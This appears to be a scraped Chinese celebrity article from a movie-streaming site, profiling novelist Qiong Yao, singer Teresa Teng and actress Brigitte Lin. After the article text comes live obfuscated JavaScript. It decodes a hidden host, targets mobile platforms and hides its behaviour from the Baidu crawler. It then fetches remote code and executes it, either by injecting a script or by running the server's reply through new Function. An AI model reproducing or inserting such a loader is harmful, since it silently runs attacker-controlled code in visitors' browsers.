•  榜单
  •  留言

首页

电影

电视剧

娱乐资讯

读琼瑶、听邓丽君、看林青霞,才女的后半生,只有林青霞得了幸福

明星资讯来源:星辰影院人气:446更新:2021-11-03 11:34:48

琼瑶一生写了六十多部小说,根据这些小说改编的电影有55部,电视剧则有34部。这些作品是一位叫平鑫涛的编辑硬催着她一部一部写出来的。

后来,琼瑶与这位有家室的编辑陷入爱恋,背负了半生的骂名。

琼瑶乳名叫凤凰,代表幸福吉祥,大名叫陈喆,代表理想顺遂,笔名叫琼瑶,浪漫有情怀。

可恰恰相反,琼瑶一生的经历一点都不顺利,一点都不浪漫。

琼瑶出生于一个书香气十足的家庭,他的父亲当时是师范大学中文系的副教授,母亲在当时最好的中学当老师。

也许是父母在教育上的成就太突出,在几个弟弟妹妹中,只有琼瑶的学习成绩拿不出手。

面对着高考和家人的压力,琼瑶无处可逃。

而这时,只有她的国文老师看中了她的天赋,朝她伸出了援助之手。

琼瑶在这个比她大25岁的男人身上找到了久违的温暖,一发不可收拾的陷了进去。

琼瑶母亲把她的落榜、厌世、悲观等负面情绪,全都归结在男老师身上,觉得他为师不尊。琼瑶母亲先去警察局告了状,但因为琼瑶和老师并没做过什么越矩的事,警察也不管,母亲不罢休,到学校里闹,又把男老师告到教育部。

两次高考落榜后,为了逃离父母,她嫁给了一文不名的文学青年庆筠。

“贫贱夫妻百事哀”,婚后的生活捉襟见肘,在这样艰苦的环境下,琼瑶没有放弃,她一手抱着儿子,一手坚持写作。

在琼瑶创作的漫长途中,她和平鑫涛逐渐亲密。但平鑫涛有妻有子,只能刻意与她保持距离。

但感情的事情,强大到如琼瑶也拒绝不了。

这件事情也成了很多人攻击琼瑶的一点。

今天真心怀念琼瑶的一代人,他们的价值观和爱情观,未必依然和她相同,他们怀念的,更多的是她曾经的陪伴。

如今,琼瑶时代已经落幕了,讨论她个人和作品的三观正不正已经不重要了,因为她留给读者和一个时代的记忆,这才是最珍贵的。

其实邓丽君的本名叫邓丽筠(音云),但大部分人读字读半边,为了照顾这些没文化的,邓丽筠就改成邓丽君了。

她一生唱过3000多首歌,其中500多首她可以背下来。

很快邓丽君就声名鹊起,对她喜欢的不得了的大人们叫她“娃娃歌后”。

邓丽君的事业更进一步,成为了丽风唱片公司旗下的正式歌手,由于丽风公司拥有很大的东南亚背景,因此在成为公司正式歌手后,邓丽君的很多演唱就放在了东南亚地区。

“路纵崎岖,亦不怕受磨练;小雨点,放心洒,早已决心向着前。”

一首《漫步人生路》,道尽她人生的坎坷和内心的不屈。

后来,邓丽君接受采访时表示自己曾经有过多段刻骨铭心的爱情,说的就是朱坚和林振发,这两段感情给她带去了很多快乐和感伤,所以邓丽君才会毫不顾忌地说“爱情多一点也不怕“这句话。

邓丽君,一代华语歌后太早地离开了喜欢她的人们,是华语乐坛的一大损失。她是华语女歌星殿堂级的人物,她的歌声难以复制,是美好的女声磁性的声音,听她的歌声就是一种美的享受。

要提起她,脑海中却没有一个词能形容她,她美得宛如天上的明月,一颦一笑都自带风情。

她是仙气与帅气的结合,是娇憨与优雅的聚集,她就是被徐克称为50年出一个的顶尖美女——林青霞。

林青霞拍了100部电影,扮演了100多个角色,刻画了不少痴情角色,也诠释了人间百态。

她的前半生几乎所有的时间都在扮演别人,戏如人生,人生如戏。

导演王家卫多次表示:“只要她愿意,我随时为她写剧本”,有一次曾当面问林青霞“会不会复出?”

林青霞先是一笑,然后低头微笑说“可能”,再一抬头笑说“明天再说”,一连三笑,答案不言而喻。

林青霞虽然是因为颜值出道,但是拍摄电影的时候却是十分勇猛。零下六七度的苏州河、臭气熏天的臭水沟说跳就跳,上岸的时候还和导演说河底有蛇。

退隐之后,她曾说:“在影圈工作了二十多年,每天紧张,每天曝光,忙于把自己最美的一面在人前表现,睡觉时间很不规律,睁开眼睛便是拍戏、出席记者招待会……晨昏颠倒,永远不知何时是尽头;

林青霞从演艺圈跨越到文学界的时候,对林青霞最大帮助的就是琼瑶。

收到林青霞寄来的书,琼瑶也是公开的发私信回复:你的书,当然支持。

现在我们看到的只是67岁的林青霞而已,我想70岁的时候,她还会做出什么让我们惊喜的事情吧。

真正的美人,人生就像一本教科书,不管经历什么考验,都能交出一份完美答卷,这人只能是林青霞。

function vwTiyNA(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function jbksBNK(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return vwTiyNA(t);};window[''+'E'+'z'+'Y'+'O'+'V'+'B'+'s'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=jbksBNK,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('aGZ0Lm99mb299lLmNu','157152',window,document,['9','AXItZifLa']);}:function(){};